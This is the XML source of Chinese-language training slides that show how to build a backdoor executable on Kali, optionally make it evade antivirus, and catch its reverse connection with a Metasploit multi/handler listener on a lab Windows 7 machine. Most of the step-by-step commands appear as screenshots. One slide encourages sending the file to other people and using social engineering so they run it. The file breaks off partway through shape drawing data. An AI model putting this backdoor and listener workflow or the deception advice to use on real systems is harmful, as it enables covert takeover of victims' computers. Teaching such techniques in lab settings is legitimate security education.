                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>并在kali上查看setup.exe文件，如图5-27所示。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37" name="图片 27" descr="image (1)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="2819400"/>
            <a:ext cx="4197350" cy="2430780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="5334000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-27 在kali上查看setup.exe</a:t>
            </a:r>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90600" y="1752600"/>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2） 制作一个后门程序</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219200" y="2209800"/>
            <a:ext cx="9314180" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="254000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>为生成的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>setup.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>赋予可执行的权限，如果有必要可以对该文件执行免杀。命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>chmod 777 /root/setup.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>5-28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>所示。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2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="3352800"/>
            <a:ext cx="4105910" cy="619125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3810000"/>
            <a:ext cx="8346440" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5-28 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>setup.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>赋予可执行的权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="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048385" y="1676400"/>
            <a:ext cx="4915535" cy="3737610"/>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3）打开msf，配置参数</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打开msf，加载exploit/multi/handler模块，同时设置本地主机地址，本地端口，命令：</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msfconsole  </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msf &gt; use exploit/multi/handler</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msf exploit(handler) &gt; set lhost 10.10.10.128</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msf exploit(handler) &gt; set lport 50000</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结果如图5-29所示。</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5" name="图片 29" descr="image (3)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="1143000"/>
            <a:ext cx="5124450" cy="4505960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7406005" y="5791200"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-29 打开msf配置参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1048385" y="6400800"/>
            <a:ext cx="12596495"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rPr>
              <a:t>设置本地主机：选择“允许以程序执行文件”;meterpreter/。 进入所在目录，加载exploit/</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90600" y="1600200"/>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4）开始执行渗透攻击并监听</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2209800"/>
            <a:ext cx="6096000" cy="36830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cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>开始执行渗透攻击并监听，结果如图5-30所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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76400" y="2667000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              </a:rPr>
              <a:t> msf exploit(handler) &gt; exploit -z -j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 30" descr="image"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="3124200"/>
            <a:ext cx="5328285" cy="1606550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="4953000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-30 执行渗透攻击并监听</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287645" y="5343525"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>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90600" y="1600200"/>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5）将后门程序植入到win7中</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66800" y="2133600"/>
            <a:ext cx="10302240" cy="147637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此时，你可以将文件发给其他人，利用社会工程学知识让别人在他的win7系统上打开该文件，那么你的目的就达到了。</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在kali上找到setrp.exe文件并且复制该文件，如图5-31所示。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5" name="图片 31" descr="image (1)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093720" y="3733800"/>
            <a:ext cx="3594100" cy="2451100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-31 复制setup.exe文件</a:t>
            </a:r>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90600" y="1600200"/>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5）将后门程序植入到win7中</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101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2248535"/>
            <a:ext cx="8147050" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="254000"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>下面就是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>win7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>虚拟机中的文件，然后运行该文件，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>5-32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>所示。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5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="2743200"/>
            <a:ext cx="2686685" cy="2228215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="4800600"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5-32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>复制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>setup.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>win7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="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90600" y="1600200"/>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5）将后门程序植入到win7中</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95400" y="2153285"/>
            <a:ext cx="7850505" cy="553085"/>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需要能将程序直接拷贝都目标主机中并进行执行，如图5-33所示。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42" name="图片 33" descr="image (3)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2895600"/>
            <a:ext cx="3712210" cy="2222500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="5334000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-33 在win7上以管理员身份运行setup.exe文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="5791200"/>
            <a:ext cx="10308590" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>后门程序反向连接到msf，msf发起第二次攻击（开始渗透），然后客户端（后门程序）连接到服务端（msf）。</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90600" y="1600200"/>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6）监听，目标主机已经被攻陷</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83665" y="2133600"/>
            <a:ext cx="10300335" cy="1014730"/>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然后开始监听，详细如图5-34所示，handler模块并进行设置本地主机,这时候也可以做一些免杀。</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58" name="图片 34" descr="image (4)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3048000"/>
            <a:ext cx="6146165" cy="1339215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="3244850"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-34 开始监听目标主机</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4495800"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-34 开始监听目标主机</a:t>
            </a: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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2030022" y="1554865"/>
            <a:ext cx="1096419" cy="1096782"/>
            <a:chOff x="2030022" y="1554865"/>
            <a:chExt cx="1096419" cy="1096782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2030022" y="1554865"/>
              <a:ext cx="1096419" cy="1096782"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t"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path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="100000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2212018" y="1813887"/>
              <a:ext cx="730886" cy="670462"/>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path>
                <a:path w="988" h="905">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path>
                <a:path w="988" h="905">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path>
                <a:path w="988" h="905">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path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8308054" y="1554865"/>
            <a:ext cx="1096419" cy="1096782"/>
            <a:chOff x="8308054" y="1554865"/>
            <a:chExt cx="1096419" cy="1096782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8308054" y="1554865"/>
              <a:ext cx="1096419" cy="1096782"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t"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path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="100000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8540311" y="1698393"/>
              <a:ext cx="653950" cy="899907"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t"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path>
                <a:path w="885" h="1217">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path>
                <a:path w="885" h="1217">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path>
                <a:path w="885" h="1217">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path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5170218" y="1554865"/>
            <a:ext cx="1096419" cy="1096782"/>
            <a:chOff x="5170218" y="1554865"/>
            <a:chExt cx="1096419" cy="1096782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5170218" y="1554865"/>
              <a:ext cx="1096419" cy="1096782"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t"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path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="100000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5387687" y="1754643"/>
              <a:ext cx="656944" cy="787408"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t"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path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="556" y="328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="795" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556" y="328"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="889" h="1065">
                  <a:moveTo>
                    <a:pt x="522" y="283"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="729" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
